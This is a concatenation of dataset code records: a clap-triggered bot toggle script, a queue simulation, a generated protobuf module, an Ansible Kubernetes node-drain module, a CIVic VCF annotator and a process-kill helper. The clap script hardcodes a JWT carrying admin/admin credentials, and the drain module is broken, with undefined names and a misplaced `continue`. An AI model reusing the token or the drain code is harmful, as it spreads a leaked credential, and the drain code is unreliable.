\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJwYXNzIjoiYWRtaW4iLCJpYXQiOjE1NTQzMzE3NDYsImV4cCI6MS4wMDAwMDAwMDAwMDE1NTQ1ZSsyMX0.qzxBdYfCGxcvQkhaCBsKiC7DVVG0wOZMe68axjw0x5M\"\nheaders = {'x-access-token': token}\n\nactivated = getActivated(headers)\n\n\n\n\nif __name__ == '__main__':\n\tif (activated):\n\t\tprint(\"Started - Currently set to Activated\")\n\telse:\n\t\tprint(\"Started - Currently set to Deactivated\")\n\n\twhile (True):\n\t\tprint(\"Awaiting Clap...\")\n\t\tfeed = sc.MicrophoneFeed()\n\t\tdetector = sc.AmplitudeDetector(feed, threshold=15000000)\n\t\tfor clap in detector:\n\t\t\tprint(\"Clap Detected\")\n\t\t\tif (activated):\n\t\t\t\tresp = requests.put(deactivateUrl, headers=headers)\n\t\t\t\tif resp.status_code == 200:\n\t\t\t\t\tprint(\"PyBot Deactivated\")\n\t\t\t\t\tactivated = False;\n\t\t\t\telse:\n\t\t\t\t\tprint(\"PyBot Deactivated FAILED\")\n\n\n\t\t\telse:\n\t\t\t\tresp = requests.put(activateUrl, headers=headers)\n\t\t\t\tif resp.status_code == 200:\n\t\t\t\t\tprint(\"PyBot Activated\")\n\t\t\t\t\tactivated = True;\n\t\t\t\telse:\n\t\t\t\t\tprint(\"PyBot Activated FAILED\")\n\n\t\t\tbreak;\n\n","sub_path":"clapper.py","file_name":"clapper.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"654170706","text":"import numpy.random as nr\nimport math\nimport matplotlib.pyplot as plt\n\n\ndef intensity_to_param(intensity):\n return 10 / intensity\n\n\ndef normal_distribution(params):\n time = nr.normal(abs(params[0]), abs(params[1]))\n return abs(time)\n\n\nclass Generator:\n def __init__(self, law, params, gen_type=1):\n self.func = law\n self.params = params\n self.type = gen_type\n\n def generate(self):\n return self.func(self.params)\n\n\nclass Processor:\n def __init__(self, law, params1, params2):\n self.func = law\n self.params1 = params1\n self.params2 = params2\n self.busy = False\n\n def generate(self, gen_type):\n if gen_type == 1:\n return self.func(self.params1)\n else:\n return self.func(self.params2)\n\n\nclass Model:\n def __init__(self, request_count, generators_params=[[3, 0.5], [2, 0.1]], processors_params=[[2, 0.5], [1, 0.5]]):\n self.start_time = 0\n self.request_count = request_count\n\n self.generators_count = len(generators_params)\n self.generators = []\n for i in range(self.generators_count):\n gen_type = 1\n if i % 2 == 1:\n gen_type = 2\n self.generators.append(Generator(normal_distribution, generators_params[i], gen_type))\n self.processors_count = 1\n self.processors = []\n self.processors.append(Processor(normal_distribution, processors_params[0], processors_params[1]))\n self.generated = 0\n self.queue_length = 0\n self.queue_len_max = 0\n self.avg_waiting_time = 0\n self.processed = 0\n self.started_processing = 0\n self.events = []\n\n def reset(self):\n self.generated = 0\n self.queue_length = 0\n self.queue_len_max = 0\n self.avg_waiting_time = 0\n self.processed = 0\n self.started_processing = 0\n self.events = []\n for processor in self.processors:\n processor.busy = False\n\n def check_len_max(self):\n if self.queue_length > self.queue_len_max:\n self.queue_len_max = self.queue_length\n\n # event: [time of event, type - 'p' or 'g', index in generators or processors lists, waiting time]\n\n def add_event(self, event):\n i = 0\n while i < len(self.events) and event[0] >= self.events[i][0]:\n i += 1\n self.events.insert(i, event)\n\n def modelling(self):\n for i in range(self.generators_count):\n self.add_event([self.start_time, 'g' + str(i + 1), i, 0])\n self.queue_length += 1\n self.generated += 1\n self.check_len_max()\n while self.generated < self.request_count:\n event = self.events.pop(0)\n if event[1][0] == 'g':\n self.start_processing(event)\n else:\n self.finish_operate(event)\n self.avg_waiting_time /= self.started_processing\n return self.avg_waiting_time, self.processed, self.generated\n\n def start_processing(self, event):\n i = 0\n\n # find free processor\n while i < self.processors_count and self.processors[i].busy:\n i += 1\n\n # if found free one:\n if i != self.processors_count:\n self.queue_length -= 1\n self.processors[i].busy = True\n if event[1] == 'g1':\n proc_params = self.processors[i].params1\n else:\n proc_params = self.processors[i].params2\n self.add_event([event[0] + self.processors[i].generate(proc_params), 'p', i, 0])\n self.started_processing += 1\n self.avg_waiting_time += event[3]\n\n # if there is no free processors:\n else:\n j = 0\n while j < len(self.events) and self.events[j][1] != 'p':\n j += 1\n self.add_event([self.events[j][0], event[1], event[2], event[3] + self.events[j][0] - event[0]])\n\n # generating new events\n if event[3] == 0:\n self.add_event([event[0] + self.generators[event[2]].generate(), event[1], event[2], 0])\n self.queue_length += 1\n self.generated += 1\n self.check_len_max()\n\n def finish_operate(self, event):\n self.processors[event[2]].busy = False\n self.processed += 1\n\n\ndef get_avg_model(model, times):\n avg_waiting_time = 0\n for i in range(times):\n result_avg_time, result_processed, tmp = model.modelling()\n avg_waiting_time += result_avg_time\n model.reset()\n return avg_waiting_time / times\n\n\ndef get_plot(lambda1, d1, lambda3, d2):\n ro_array = []\n wait_time = []\n ro = 0.05\n generators_params = [[10 / lambda1, d1], [10 / lambda3, d2]]\n\n while ro <= 1:\n ro_array.append(ro)\n lambda2 = lambda1 / ro\n processors_params = [[10 / lambda2, d1], [10 / (lambda3 / ro), d2]]\n model = Model(100, generators_params, processors_params)\n avg_time = get_avg_model(model, 50)\n wait_time.append(avg_time)\n ro += 0.05\n\n plt.plot(ro_array, wait_time)\n plt.xlabel(\"загрузка\")\n plt.ylabel(\"время пребывания\")\n plt.show()\n","sub_path":"lab4/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"88697228","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2019 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Generated by the protocol buffer compiler. DO NOT EDIT!\n# source: google/cloud/monitoring/dashboard_v1/proto/widget.proto\n\nimport sys\n\n_b = sys.version_info[0] < 3 and (lambda x: x) or (lambda x: x.encode(\"latin1\"))\nfrom google.protobuf import descriptor as _descriptor\nfrom google.protobuf import message as _message\nfrom google.protobuf import reflection as _reflection\nfrom google.protobuf import symbol_database as _symbol_database\n\n# @@protoc_insertion_point(imports)\n\n_sym_db = _symbol_database.Default()\n\n\nfrom google.api import field_behavior_pb2 as google_dot_api_dot_field__behavior__pb2\nfrom google.cloud.monitoring_dashboard.v1.proto import (\n scorecard_pb2 as google_dot_cloud_dot_monitoring_dot_dashboard__v1_dot_proto_dot_scorecard__pb2,\n)\nfrom google.cloud.monitoring_dashboard.v1.proto import (\n text_pb2 as google_dot_cloud_dot_monitoring_dot_dashboard__v1_dot_proto_dot_text__pb2,\n)\nfrom google.cloud.monitoring_dashboard.v1.proto import (\n xychart_pb2 as google_dot_cloud_dot_monitoring_dot_dashboard__v1_dot_proto_dot_xychart__pb2,\n)\nfrom google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2\n\n\nDESCRIPTOR = _descriptor.FileDescriptor(\n name=\"google/cloud/monitoring/dashboard_v1/proto/widget.proto\",\n package=\"google.monitoring.dashboard.v1\",\n syntax=\"proto3\",\n serialized_options=_b(\n '\\n\"com.google.monitoring.dashboard.v1B\\013WidgetProtoP\\001ZGgoogle.golang.org/genproto/googleapis/monitoring/dashboard/v1;dashboard'\n ),\n serialized_pb=_b(\n \"\\n7google/cloud/monitoring/dashboard_v1/proto/widget.proto\\x12\\x1egoogle.monitoring.dashboard.v1\\x1a\\x1fgoogle/api/field_behavior.proto\\x1a:google/cloud/monitoring/dashboard_v1/proto/scorecard.proto\\x1a\\x35google/cloud/monitoring/dashboard_v1/proto/text.proto\\x1a\\x38google/cloud/monitoring/dashboard_v1/proto/xychart.proto\\x1a\\x1bgoogle/protobuf/empty.proto\\\"\\x83\\x02\\n\\x06Widget\\x12\\x12\\n\\x05title\\x18\\x01 \\x01(\\tB\\x03\\xe0\\x41\\x01\\x12;\\n\\x08xy_chart\\x18\\x02 \\x01(\\x0b\\x32'.google.monitoring.dashboard.v1.XyChartH\\x00\\x12>\\n\\tscorecard\\x18\\x03 \\x01(\\x0b\\x32).google.monitoring.dashboard.v1.ScorecardH\\x00\\x12\\x34\\n\\x04text\\x18\\x04 \\x01(\\x0b\\x32$.google.monitoring.dashboard.v1.TextH\\x00\\x12'\\n\\x05\\x62lank\\x18\\x05 \\x01(\\x0b\\x32\\x16.google.protobuf.EmptyH\\x00\\x42\\t\\n\\x07\\x63ontentB|\\n\\\"com.google.monitoring.dashboard.v1B\\x0bWidgetProtoP\\x01ZGgoogle.golang.org/genproto/googleapis/monitoring/dashboard/v1;dashboardb\\x06proto3\"\n ),\n dependencies=[\n google_dot_api_dot_field__behavior__pb2.DESCRIPTOR,\n google_dot_cloud_dot_monitoring_dot_dashboard__v1_dot_proto_dot_scorecard__pb2.DESCRIPTOR,\n google_dot_cloud_dot_monitoring_dot_dashboard__v1_dot_proto_dot_text__pb2.DESCRIPTOR,\n google_dot_cloud_dot_monitoring_dot_dashboard__v1_dot_proto_dot_xychart__pb2.DESCRIPTOR,\n google_dot_protobuf_dot_empty__pb2.DESCRIPTOR,\n ],\n)\n\n\n_WIDGET = _descriptor.Descriptor(\n name=\"Widget\",\n full_name=\"google.monitoring.dashboard.v1.Widget\",\n filename=None,\n file=DESCRIPTOR,\n containing_type=None,\n fields=[\n _descriptor.FieldDescriptor(\n name=\"title\",\n full_name=\"google.monitoring.dashboard.v1.Widget.title\",\n index=0,\n number=1,\n type=9,\n cpp_type=9,\n label=1,\n has_default_value=False,\n default_value=_b(\"\").decode(\"utf-8\"),\n message_type=None,\n enum_type=None,\n containing_type=None,\n is_extension=False,\n extension_scope=None,\n serialized_options=_b(\"\\340A\\001\"),\n file=DESCRIPTOR,\n ),\n _descriptor.FieldDescriptor(\n name=\"xy_chart\",\n full_name=\"google.monitoring.dashboard.v1.Widget.xy_chart\",\n index=1,\n number=2,\n type=11,\n cpp_type=10,\n label=1,\n has_default_value=False,\n default_value=None,\n message_type=None,\n enum_type=None,\n containing_type=None,\n is_extension=False,\n extension_scope=None,\n serialized_options=None,\n file=DESCRIPTOR,\n ),\n _descriptor.FieldDescriptor(\n name=\"scorecard\",\n full_name=\"google.monitoring.dashboard.v1.Widget.scorecard\",\n index=2,\n number=3,\n type=11,\n cpp_type=10,\n label=1,\n has_default_value=False,\n default_value=None,\n message_type=None,\n enum_type=None,\n containing_type=None,\n is_extension=False,\n extension_scope=None,\n serialized_options=None,\n file=DESCRIPTOR,\n ),\n _descriptor.FieldDescriptor(\n name=\"text\",\n full_name=\"google.monitoring.dashboard.v1.Widget.text\",\n index=3,\n number=4,\n type=11,\n cpp_type=10,\n label=1,\n has_default_value=False,\n default_value=None,\n message_type=None,\n enum_type=None,\n containing_type=None,\n is_extension=False,\n extension_scope=None,\n serialized_options=None,\n file=DESCRIPTOR,\n ),\n _descriptor.FieldDescriptor(\n name=\"blank\",\n full_name=\"google.monitoring.dashboard.v1.Widget.blank\",\n index=4,\n number=5,\n type=11,\n cpp_type=10,\n label=1,\n has_default_value=False,\n default_value=None,\n message_type=None,\n enum_type=None,\n containing_type=None,\n is_extension=False,\n extension_scope=None,\n serialized_options=None,\n file=DESCRIPTOR,\n ),\n ],\n extensions=[],\n nested_types=[],\n enum_types=[],\n serialized_options=None,\n is_extendable=False,\n syntax=\"proto3\",\n extension_ranges=[],\n oneofs=[\n _descriptor.OneofDescriptor(\n name=\"content\",\n full_name=\"google.monitoring.dashboard.v1.Widget.content\",\n index=0,\n containing_type=None,\n fields=[],\n )\n ],\n serialized_start=327,\n serialized_end=586,\n)\n\n_WIDGET.fields_by_name[\n \"xy_chart\"\n].message_type = (\n google_dot_cloud_dot_monitoring_dot_dashboard__v1_dot_proto_dot_xychart__pb2._XYCHART\n)\n_WIDGET.fields_by_name[\n \"scorecard\"\n].message_type = (\n google_dot_cloud_dot_monitoring_dot_dashboard__v1_dot_proto_dot_scorecard__pb2._SCORECARD\n)\n_WIDGET.fields_by_name[\n \"text\"\n].message_type = (\n google_dot_cloud_dot_monitoring_dot_dashboard__v1_dot_proto_dot_text__pb2._TEXT\n)\n_WIDGET.fields_by_name[\"blank\"].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY\n_WIDGET.oneofs_by_name[\"content\"].fields.append(_WIDGET.fields_by_name[\"xy_chart\"])\n_WIDGET.fields_by_name[\"xy_chart\"].containing_oneof = _WIDGET.oneofs_by_name[\"content\"]\n_WIDGET.oneofs_by_name[\"content\"].fields.append(_WIDGET.fields_by_name[\"scorecard\"])\n_WIDGET.fields_by_name[\"scorecard\"].containing_oneof = _WIDGET.oneofs_by_name[\"content\"]\n_WIDGET.oneofs_by_name[\"content\"].fields.append(_WIDGET.fields_by_name[\"text\"])\n_WIDGET.fields_by_name[\"text\"].containing_oneof = _WIDGET.oneofs_by_name[\"content\"]\n_WIDGET.oneofs_by_name[\"content\"].fields.append(_WIDGET.fields_by_name[\"blank\"])\n_WIDGET.fields_by_name[\"blank\"].containing_oneof = _WIDGET.oneofs_by_name[\"content\"]\nDESCRIPTOR.message_types_by_name[\"Widget\"] = _WIDGET\n_sym_db.RegisterFileDescriptor(DESCRIPTOR)\n\nWidget = _reflection.GeneratedProtocolMessageType(\n \"Widget\",\n (_message.Message,),\n {\n \"DESCRIPTOR\": _WIDGET,\n \"__module__\": \"google.cloud.monitoring.dashboard_v1.proto.widget_pb2\",\n \"__doc__\": \"\"\"Widget contains a single dashboard component and\n configuration of how to present the component in the dashboard.\n \n \n Attributes:\n title:\n Optional. The title of the widget.\n content:\n Content defines the component used to populate the widget.\n xy_chart:\n A chart of time series data.\n scorecard:\n A scorecard summarizing time series data.\n text:\n A raw string or markdown displaying textual content.\n blank:\n A blank space.\n \"\"\",\n # @@protoc_insertion_point(class_scope:google.monitoring.dashboard.v1.Widget)\n },\n)\n_sym_db.RegisterMessage(Widget)\n\n\nDESCRIPTOR._options = None\n_WIDGET.fields_by_name[\"title\"]._options = None\n# @@protoc_insertion_point(module_scope)\n","sub_path":"google/cloud/monitoring_dashboard/v1/proto/widget_pb2.py","file_name":"widget_pb2.py","file_ext":"py","file_size_in_byte":9223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"163777575","text":"import random\nfrom ansible.module_utils.basic import AnsibleModule\nfrom kubernetes import client\nfrom kubernetes.client.rest import ApiException\n\nfrom ansible_collections.pystol.actions.plugins.module_utils.k8s_common import load_kubernetes_config\n\nANSIBLE_METADATA = {\n 'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'\n}\n\nDOCUMENTATION = '''\n---\nmodule: drain_nodes\n\nshort_description: A module that drain nodes\n\nversion_added: \"2.8\"\n\ndescription:\n - \"A module that drain nodes\"\n\noptions:\n names:\n default: default\n amount:\n default: 10\n\nauthor:\n - Carlos Camacho\n'''\n\nEXAMPLES = '''\n# Pass in a message\n- name: Test with a message\n drain_nodes:\n names: [\"minikube\", \"worker1\"]\n amount: 3\n'''\n\nRETURN = '''\nfact:\n description: Actual facts\n type: str\n sample: Jane Doe is a smart cookie.\n'''\n\nFACTS = [\n \"{name} is looking great today!\",\n \"{name} is a smart cookie.\",\n \"I’d choose {name}'s company over pizza anytime.\"\n]\n\n\ndef evict_pod(name, namespace):\n core_v1 = client.CoreV1Api()\n body = kubernetes.client.V1beta1Eviction() # V1beta1Eviction\n try:\n api_response = core_v1.create_namespaced_pod_eviction(\n name=name,\n namespace=namespace,\n body=body)\n pprint(api_response)\n except ApiException as e:\n print(\"CoreV1Api->create_namespaced_pod_eviction: %s\\n\" % e)\n\n\ndef cordon_node(name):\n core_v1 = client.CoreV1Api()\n body = {\n \"spec\": {\n \"unschedulable\": True\n }\n }\n try:\n api_response = core_v1.patch_node(\n name=name,\n body=body)\n pprint(api_response)\n except ApiException as e:\n print(\"CoreV1Api->cordon_node: %s\\n\" % e)\n\n\ndef uncordon_node(name):\n core_v1 = client.CoreV1Api()\n body = {\n \"spec\": {\n \"unschedulable\": False\n }\n }\n try:\n api_response = core_v1.patch_node(\n name=name,\n body=body)\n pprint(api_response)\n except ApiException as e:\n print(\"CoreV1Api->uncordon_node: %s\\n\" % e)\n\ndef drain_node(node_name):\n ret = v1.list_pod_for_all_namespaces(\n field_selector=\"spec.nodeName={}\".format(node_name))\n\n if not ret.items:\n continue\n\n # following the drain command from kubectl as best as we can\n eviction_candidates = []\n for pod in ret.items:\n name = pod.metadata.name\n phase = pod.status.phase\n volumes = pod.spec.volumes\n annotations = pod.metadata.annotations\n\n # do not handle mirror pods\n if annotations and \"kubernetes.io/config.mirror\" in annotations:\n logger.debug(\"Not deleting mirror pod '{}' on \"\n \"node '{}'\".format(name, node_name))\n continue\n\n if any(filter(lambda v: v.empty_dir is not None, volumes)):\n logger.debug(\n \"Pod '{}' on node '{}' has a volume made \"\n \"of a local storage\".format(name, node_name))\n if not delete_pods_with_local_storage:\n logger.debug(\"Not evicting a pod with local storage\")\n continue\n logger.debug(\"Deleting anyway due to flag\")\n eviction_candidates.append(pod)\n continue\n\n if phase in [\"Succeeded\", \"Failed\"]:\n eviction_candidates.append(pod)\n continue\n\n for owner in pod.metadata.owner_references:\n if owner.controller and owner.kind != \"DaemonSet\":\n eviction_candidates.append(pod)\n break\n elif owner.kind == \"DaemonSet\":\n logger.debug(\n \"Pod '{}' on node '{}' is owned by a DaemonSet. Will \"\n \"not evict it\".format(name, node_name))\n break\n else:\n raise ActivityFailed(\n \"Pod '{}' on node '{}' is unmanaged, cannot drain this \"\n \"node. Delete it manually first?\".format(name, node_name))\n\n if not eviction_candidates:\n logger.debug(\"No pods to evict. Let's return.\")\n return True\n\n logger.debug(\"Found {} pods to evict\".format(len(eviction_candidates)))\n for pod in eviction_candidates:\n eviction = client.V1beta1Eviction()\n\n eviction.metadata = client.V1ObjectMeta()\n eviction.metadata.name = pod.metadata.name\n eviction.metadata.namespace = pod.metadata.namespace\n\n eviction.delete_options = client.V1DeleteOptions()\n try:\n v1.create_namespaced_pod_eviction(\n pod.metadata.name, pod.metadata.namespace, body=eviction)\n except ApiException as x:\n raise ActivityFailed(\n \"Failed to evict pod {}: {}\".format(\n pod.metadata.name, x.body))\n\n pods = eviction_candidates[:]\n started = time.time()\n while True:\n logger.debug(\"Waiting for {} pods to go\".format(len(pods)))\n if time.time() - started > timeout:\n remaining_pods = \"\\n\".join([p.metadata.name for p in pods])\n raise ActivityFailed(\n \"Draining nodes did not completed within {}s. \"\n \"Remaining pods are:\\n{}\".format(timeout, remaining_pods))\n\n pending_pods = pods[:]\n for pod in pods:\n try:\n p = v1.read_namespaced_pod(\n pod.metadata.name, pod.metadata.namespace)\n # rescheduled elsewhere?\n if p.metadata.uid != pod.metadata.uid:\n pending_pods.remove(pod)\n continue\n logger.debug(\"Pod '{}' still around in phase: {}\".format(\n p.metadata.name, p.status.phase))\n except ApiException as x:\n if x.status == 404:\n # gone...\n pending_pods.remove(pod)\n pods = pending_pods[:]\n if not pods:\n logger.debug(\"Evicted all pods we could\")\n break\n\n time.sleep(10)\n\n return True\n\n\ndef get_pods(namespace=''):\n api_instance = client.CoreV1Api()\n try:\n if namespace == '':\n api_response = api_instance.list_pod_for_all_namespaces()\n else:\n api_response = api_instance.list_namespaced_pod(\n namespace,\n field_selector='status.phase=Running')\n return api_response\n except ApiException as e:\n print(\"CoreV1Api->list_pod_for_all_namespaces: %s\\n\" % e)\n\n\ndef run_module():\n # define available arguments/parameters a user can pass to the module\n module_args = dict(\n names=dict(type='str', required=True),\n amount=dict(type='int', required=True),\n )\n\n module = AnsibleModule(\n argument_spec=module_args,\n supports_check_mode=True\n )\n\n out = \"\"\n err = \"\"\n rc = 0\n\n namespace = module.params['namespace']\n amount = module.params['amount']\n\n result = dict(\n changed=True,\n stdout=out,\n stderr=err,\n rc=rc,\n )\n\n result['fact'] = random.choice(FACTS).format(\n name=module.params['namespace']\n )\n\n if module.check_mode:\n return result\n\n module.exit_json(**result)\n\n\ndef main():\n run_module()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"actions/plugins/modules/drain_nodes.py","file_name":"drain_nodes.py","file_ext":"py","file_size_in_byte":7291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"598356321","text":"#!/usr/bin/bash\r\n__doc__ = \"\"\"\r\n CIVic is a great database that provides clinical interpretation for variants in cancer:\r\n https://civicdb.org/home\r\n\r\n This script take VCF file that already been annotated with HGVS nomenclature on each variant\r\n (contains pHGVS on info section), and output VCF file with annotated civix information \r\n\"\"\"\r\n__author__ = \"Kai\"\r\n__date__ = \"2019/12/30\"\r\n\r\n\r\nimport pysam\r\nimport argparse\r\nimport os\r\nimport re\r\nfrom collections import defaultdict\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n\r\ndef main(ifname, ofname, civic):\r\n civic_variants, civic_phgvs, civic_chgvs, civic_exon = parse_civic(civic)\r\n with pysam.VariantFile(ifname, \"r\") as vcfin:\r\n if \"civic\" not in vcfin.header.info:\r\n vcfin.header.info.add(\"civic\", \".\", \"String\", \"Information described in CIVic. Format: variant|disease|drugs|evidence_level|evidence_statement|variant_origin|citation_id|citation\")\r\n vcfout = pysam.VariantFile(ofname, \"w\", header = vcfin.header)\r\n for rec in vcfin:\r\n # normalise genomic coordinate \r\n if len(rec.ref) == 1 and len(rec.alts[0]) == 1:\r\n start = rec.pos\r\n ref, alt = rec.ref, rec.alts[0]\r\n\r\n elif len(rec.ref) > len(rec.alts[0]):\r\n # deletion\r\n if len(rec.alts[0]) == 1:\r\n start = rec.start + 2\r\n ref = rec.ref[1:]\r\n alt = \"-\"\r\n else:\r\n start = rec.start + 2\r\n ref = rec.ref[1:]\r\n alt = rec.alts[0][1:]\r\n else:\r\n # insertion\r\n if len(rec.alts[0]) == 1:\r\n start = rec.start + 1\r\n ref = \"-\"\r\n alt = rec.alts[0][1:]\r\n else:\r\n start = rec.start + 1\r\n ref = rec.ref[1:]\r\n alt = rec.alts[0][1:]\r\n \r\n if (rec.chrom.lstrip(\"chr\"), start, ref, alt) in civic_variants:\r\n rec.info['civic'] = \"|\".join(civic_variants[(rec.chrom.lstrip(\"chr\"), start, ref, alt)])\r\n continue\r\n\r\n if rec.info['gene'] in civic_phgvs:\r\n if rec.info['pHGVS']:\r\n phgvs = convert_amino_acid(rec.info['pHGVS'].lstrip(\"p.\"))\r\n if phgvs in civic_phgvs[rec.info['gene']]:\r\n rec.info['civic'] = \"|\".join(civic_phgvs[rec.info['gene']][rec.info['pHGVS']])\r\n if phgvs[:-1] in civic_phgvs[rec.info['gene']]:\r\n rec.info['civic'] = \"|\".join(civic_phgvs[rec.info['gene']][rec.info['pHGVS']])\r\n if rec.info['cHGVS'] in civic_chgvs[rec.info['gene']]:\r\n rec.info['civic'] = \"|\".join(civic_chgvs[rec.info['gene']][rec.info['cHGVS']])\r\n\r\n vcfout.write(rec)\r\n\r\n\r\ndef convert_amino_acid(hgvs):\r\n \"\"\"\r\n Convert three-letter abbreviation to one-letter abbreviation, so that hgvs name can meet oncoKB criteria\r\n e.g. p.Pro373fs --> p.P373fs\r\n \"\"\"\r\n amino_dict = {'Gly': 'G', 'Cys': 'C', 'Glu': 'E', 'Asp': 'D', 'Ile': 'I',\r\n 'Pro': 'P', 'Tyr': 'Y', 'Lys': 'K', 'Gln': 'Q', 'Trp': 'W',\r\n 'Leu': 'L', 'Phe': 'F', 'Val': 'V', 'Ser': 'S', 'Met': 'M',\r\n 'Ala': 'A', 'His': 'H', 'Ter': 'X', 'Asn': 'N', 'Thr': 'T',\r\n 'Arg': 'R'}\r\n new_hgvs = hgvs\r\n for index, letter in enumerate(hgvs):\r\n if hgvs[index: index+3] not in amino_dict:\r\n continue\r\n new_hgvs = new_hgvs.replace(hgvs[index:index+3], amino_dict[hgvs[index:index+3]])\r\n return new_hgvs\r\n\r\n\r\ndef parse_civic(civic):\r\n \"\"\"\r\n parse civic database into a dictionary. Format:\r\n civic_database = {gene: {variant: (disease, drug, evidence_level, evidence_statement, variant_origin, citation_id, citation), ...}, ...}\r\n \"\"\"\r\n civic_variants = {}\r\n civic_phgvs = defaultdict(dict)\r\n civic_chgvs = defaultdict(dict)\r\n civic_exon = defaultdict(dict)\r\n\r\n df = pd.read_csv(civic, sep=\"\\t\", )\r\n for index, row in df.iterrows():\r\n # ignore non-snp/indel variants\r\n if not pd.isnull(row['representative_transcript2']):\r\n continue\r\n if \"-\" in row['variant']:\r\n continue\r\n if 'EXPRESSION' in row['variant']:\r\n continue\r\n if 'fusion' in row['variant'].lower():\r\n continue\r\n if 'AMPLIFICATION' in row['variant']:\r\n continue\r\n if 'PHOSPHORYLATION' in row['variant']:\r\n continue\r\n if 'REARRANGEMENT' in row['variant']:\r\n continue\r\n if 'METHYLATION' in row['variant']:\r\n continue\r\n if 'TRANSLOCATION' in row['variant']:\r\n continue\r\n if 'SERUM' in row['variant']:\r\n continue\r\n if 'HOMOZYGOSITY' in row['variant']:\r\n continue\r\n if 'Alu insertion' in row['variant']:\r\n continue\r\n if 'MISLOCALIZATION' in row['variant']:\r\n continue\r\n if 'ALTER' in row['variant']:\r\n continue\r\n if 'VARIATION' in row['variant']:\r\n continue\r\n if 'WILD' in row['variant']:\r\n continue\r\n\r\n # match via genomic coordinate\r\n if row['drugs'] is np.nan:\r\n drug = \"\"\r\n else:\r\n drug = row['drugs']\r\n\r\n evidence_statement = str(row['evidence_statement'].encode(\"utf-8\"))\r\n if not pd.isnull(row['reference_bases']):\r\n ikey = (row['chromosome'], int(row['start']), row['reference_bases'], row['variant_bases'])\r\n civic_variants[ikey] = (row['variant'], row['disease'], drug, row['evidence_level'], \r\n evidence_statement, row['variant_origin'], \r\n row['citation_id'], row['citation'])\r\n continue\r\n\r\n # rest of variant matches via HGVS momenclature\r\n m1 = re.search(r'[A-Z]\\d+[A-Z]', row['variant'])\r\n m2 = re.search(r'[A-Z]\\d+', row['variant'])\r\n m3 = re.search(r'([cC]\\.(\\d+)[\\+-]\\d+[A-Z]>[A-Z])', row['variant'])\r\n m4 = re.search(r'EXON (\\d+) MUTATION', row['variant'])\r\n m5 = re.search(r'EXON (\\d+)-(\\d+) MUTATION', row['variant'])\r\n if m1 or m2:\r\n civic_phgvs[row['gene']][row['variant']] = (row['variant'], row['disease'], drug, row['evidence_level'], \r\n evidence_statement, row['variant_origin'], \r\n row['citation_id'], row['citation'])\r\n elif m3:\r\n variant = \"c.\" + m3.group(0)[2:]\r\n civic_chgvs[row['gene']][variant] = (row['variant'], row['disease'], drug, row['evidence_level'], \r\n evidence_statement, row['variant_origin'], \r\n row['citation_id'], row['citation'])\r\n elif m4:\r\n civic_exon[row['gene']][m4.group(1)] = (row['variant'], row['disease'], drug, row['evidence_level'], \r\n evidence_statement, row['variant_origin'], \r\n row['citation_id'], row['citation'])\r\n elif m5:\r\n civic_exon[row['gene']][m5.group(1)] = (row['variant'], row['disease'], drug, row['evidence_level'], \r\n evidence_statement, row['variant_origin'], \r\n row['citation_id'], row['citation'])\r\n civic_exon[row['gene']][m5.group(2)] = (row['variant'], row['disease'], drug, row['evidence_level'], \r\n evidence_statement, row['variant_origin'], \r\n row['citation_id'], row['citation'])\r\n\r\n return civic_variants, civic_phgvs, civic_chgvs, civic_exon\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser(description=__doc__)\r\n parser.add_argument(\"input\", help=\"VCF file that has HGVS names annotated\")\r\n parser.add_argument(\"civic\", help=\"CIVic database (ClinicalEvidenceSummaries)\")\r\n parser.add_argument(\"-o\", \"--output\", help=\"output filename (optional)\")\r\n args = parser.parse_args()\r\n\r\n ifname = os.path.abspath(args.input)\r\n if not args.output:\r\n ofname = os.path.join(os.path.dirname(ifname), \r\n os.path.basename(ifname).split(\".\")[0] + \".civic_anno.vcf\")\r\n else:\r\n ofname = args.output\r\n \r\n main(ifname, ofname, args.civic)\r\n\r\n\r\n\r\n","sub_path":"tertiary_analysis/anno_civic.py","file_name":"anno_civic.py","file_ext":"py","file_size_in_byte":8709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"492256184","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Statement: Sorry for this shit code \n@Time : 2020/5/13 14:45\n@Author : Jarvis\n\"\"\"\nimport os\nimport argparse\nimport re\nfrom main_code.gen_logger import get_logger\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--kill', type=str, help='指定需要终止的任务id')\n args = parser.parse_args()\n task_id = args.kill\n logger = get_logger(task_id)\n logger.warning(f\"任务{task_id}正在被终止\")\n processes = os.popen(\"ps -ef | grep python\").readlines()\n\n for p in processes:\n if len(p) < len(task_id):\n continue\n if p.endswith(task_id + '\\n'):\n span = re.search(r\"\\s\\d+\\s\", p).span()\n num = p[span[0]: span[1]]\n os.popen(f\"kill -9 {num}\")\n logger.warning(f\"任务{task_id}已被终止\")\n","sub_path":"kill.py","file_name":"kill.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"607189586","text":"import math, sys, itertools\ninput = sys.stdin.readline\n\nT = int(input())\n\nfor test_case in range(T):\n N = int(input())\n\n 